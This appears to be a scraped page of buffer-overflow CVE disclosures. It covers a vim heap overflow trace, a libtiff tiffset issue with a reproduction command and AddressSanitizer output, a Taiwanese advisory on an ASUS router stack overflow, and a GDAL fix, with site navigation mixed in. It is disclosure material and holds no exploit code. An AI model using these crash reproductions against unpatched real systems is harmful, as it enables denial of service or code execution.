        #20 0xf5d76f  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf5d76f)
        #21 0x7f0d3f15a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #22 0x41dacd  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x41dacd)
    
    0x60200000622f is located 1 bytes to the left of 4-byte region [0x602000006230,0x602000006234)
    allocated by thread T0 here:
        #0 0x49620d in malloc (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x49620d)
        #1 0x4c5d15  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4c5d15)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8) in strlen
    Shadow bytes around the buggy address:
      0x0c047fff8bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8c00: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa 06 fa
      0x0c047fff8c10: fa fa 00 01 fa fa fd fd fa fa fd fd fa fa 04 fa
      0x0c047fff8c20: fa fa 00 04 fa fa fd fd fa fa 00 03 fa fa fd fd
      0x0c047fff8c30: fa fa 00 03 fa fa fd fd fa fa 00 03 fa fa 00 06
    =>0x0c047fff8c40: fa fa 00 05 fa[fa]04 fa fa fa fa fa fa fa fa fa
      0x0c047fff8c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==836524==ABORTING

CVE-2022-0158: Heap-based Buffer Overflow in vim

LibTIFF 4.3.0 has an out-of-bounds read in _TIFFmemcpy in tif_unix.c in certain situations involving a custom tag and 0x0200 as the second word of the DE field.

Skip to content

Open Issue created Jan 04, 2022 by **4ugustus@waugustus**Contributor

**tiffset: Global-buffer-overflow in \_TIFFmemcpy, tif\_unix.c:346**

Summary

There is a global buffer overflow in \_TIFFmemcpy in libtiff/tif\_unix.c:346. Remote attackers could leverage this vulnerability to cause a denial-of-service via a crafted tiff file.

Version

LIBTIFF, Version 4.3.0, commit id cd57b554 (Wed Dec 29 18:43:34 2021 +0000)

Steps to reproduce

    # ./build_asan/bin/tiffset -s 93 helloworld ./poc
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 2 (0x2) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 0 (0x0) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 65280 (0xff00) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 250 (0xfa) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 9 (0x9) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 15 (0xf) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 65535 (0xffff) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 23901 (0x5d5d) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 93 (0x5d) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 58624 (0xe500) encountered.
    TIFFReadDirectory: Warning, Ignoring TransferFunction since BitsPerSample tag not found.
    TIFFReadDirectory: Warning, Invalid data type for tag StripByteCounts.
    TIFFReadDirectory: Warning, Invalid data type for tag TileOffsets.
    TIFFFetchStripThing: Warning, Incorrect count for "TileOffsets"; tag ignored.
    TIFFReadDirectory: Warning, Wrong "StripByteCounts" field, ignoring and calculating from imagelength.
    =================================================================
    ==62478==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000004030e7 at pc 0x7f851f5cb935 bp 0x7fff7a6c4d30 sp 0x7fff7a6c44d8
    READ of size 2053925041 at 0x0000004030e7 thread T0
        #0 0x7f851f5cb934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)
        #1 0x7f851f2dd249 in _TIFFmemcpy /root/test4/libtiff/libtiff/tif_unix.c:346
        #2 0x7f851f1e398c in setByteArray /root/test4/libtiff/libtiff/tif_dir.c:54
        #3 0x7f851f1eaa9f in _TIFFVSetField /root/test4/libtiff/libtiff/tif_dir.c:592
        #4 0x7f851f1ed75d in TIFFVSetField /root/test4/libtiff/libtiff/tif_dir.c:890
        #5 0x7f851f1ed18d in TIFFSetField /root/test4/libtiff/libtiff/tif_dir.c:834
        #6 0x401ab0 in main /root/test4/libtiff/tools/tiffset.c:149
        #7 0x7f851ee0683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
        #8 0x4012e8 in _start (/root/test4/libtiff/build_asan/bin/tiffset+0x4012e8)
    
    0x0000004030e7 is located 57 bytes to the left of global variable '*.LC0' defined in 'tiffset.c' (0x403120) of size 5
      '*.LC0' is ascii string '%s
    
    '
    0x0000004030e7 is located 0 bytes to the right of global variable 'usageMsg' defined in 'tiffset.c:49:19' (0x402f80) of size 359
      'usageMsg' is ascii string 'Set the value of a TIFF header to a specified value
    
    usage: tiffset [options] filename
    where options are:
     -s  <tagname> [count] <value>...   set the tag value
     -u  <tagname> to unset the tag
     -d  <dirno> set the directory
     -sd <diroff> set the subdirectory
     -sf <tagname> <filename>  read the tag value from file (for ASCII tags only)
     -h  this help screen
    '
    SUMMARY: AddressSanitizer: global-buffer-overflow ??:0 __asan_memcpy
    Shadow bytes around the buggy address:
      0x0000800785c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000800785d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000800785e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000800785f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000080078600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x000080078610: 00 00 00 00 00 00 00 00 00 00 00 00[07]f9 f9 f9
      0x000080078620: f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
      0x000080078630: 04 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9
      0x000080078640: 03 f9 f9 f9 f9 f9 f9 f9 00 00 00 04 f9 f9 f9 f9
      0x000080078650: 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9
      0x000080078660: 03 f9 f9 f9 f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==62478==ABORTING

Platform

    # uname -a 
    Linux 37d1a8efe7bb 4.15.0-142-generic #146~16.04.1-Ubuntu SMP Tue Apr 13 09:27:15 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

POC File

tiffset\_poc

CVE-2022-22844: tiffset: Global-buffer-overflow in _TIFFmemcpy, tif_unix.c:346 (#355) · Issues · libtiff / libtiff · GitLab

ASUS RT-AX56U Wi-Fi Router is vulnerable to stack-based buffer overflow due to improper validation for httpd parameter length. An authenticated local area network attacker can launch arbitrary code execution to control the system or disrupt service.

:::

*   勒索軟體防護專區
*   遠距辦公資安專區
*   回首頁
*   網站導覽
*   訂閱電子報
*   English

****

*   資安通報
*   Wannacry
*   駭客
*   勒索
*   手機

*   新聞公告News
    *   公告事項
    *   資安新聞
    *   資安活動
    *   電子報
*   資安服務Services
    *   資安通報
        *   一般資安通報
    *   資安聯盟
        *   資安聯盟簡介
        *   規章及會員申請暨異動申請
    *   台灣漏洞揭露平台 (TVN)
        *   TVN (Taiwan Vulnerability Note) 漏洞公告
        *   漏洞揭露政策
        *   漏洞通報
    *   惡意檔案檢測服務 (Virus Check)
    *   網路釣魚通報 (Phishing Check)
        *   網路釣魚通報
        *   釣魚網站列表
*   資安宣導Advocacy
    *   勒索軟體威脅防護專區
    *   遠距辦公資安專區
    *   企業資安事件應變處理指南
    *   威脅分析報告
    *   資安小知識
    *   資訊安全宣導
    *   資安宣導影音
    *   公開文件
*   相關網站Links
    *   國內資安組織
    *   國際資安組織
    *   網路資源
*   關於我們About us
    *   中心簡介
    *   活動紀事
        *   歷年年會活動網站
        *   活動花絮
    *   PGP KEY
    *   聯絡我們
    *   合作夥伴

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202112001

CVE ID

CVE-2021-44158

CVSS

8.0 (High)  
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

影響產品

ASUS RT-AX56U firmware version 3.0.0.4.386.44266

問題描述

ASUS RT-AX56U無線路由器httpd配置未作參數長度驗證，導致Stack-based buffer overflow漏洞，使位於區域網路內的攻擊者以一般使用者權限登入後，即可執行任意程式碼，對系統進行任意操作或中斷服務。

解決方法

ASUS RT-AX56U firmware update version to 3.0.0.4.386.45898

漏洞通報者

Jixing Wang

公開日期

2022-01-03

CVE-2021-44158: ASUS RT-AX56U Router - Stack-based buffer overflow

GDAL 3.3.0 through 3.4.0 has a heap-based buffer overflow in PCIDSK::CPCIDSKFile::ReadFromFile (called from PCIDSK::CPCIDSKSegment::ReadFromFile and PCIDSK::CPCIDSKBinarySegment::CPCIDSKBinarySegment).

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-45943: PCIDSK: fix write heap-buffer-overflow. Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=41993 by rouault · Pull Request #4944 · OSGeo/gdal

Tag

#buffer_overflow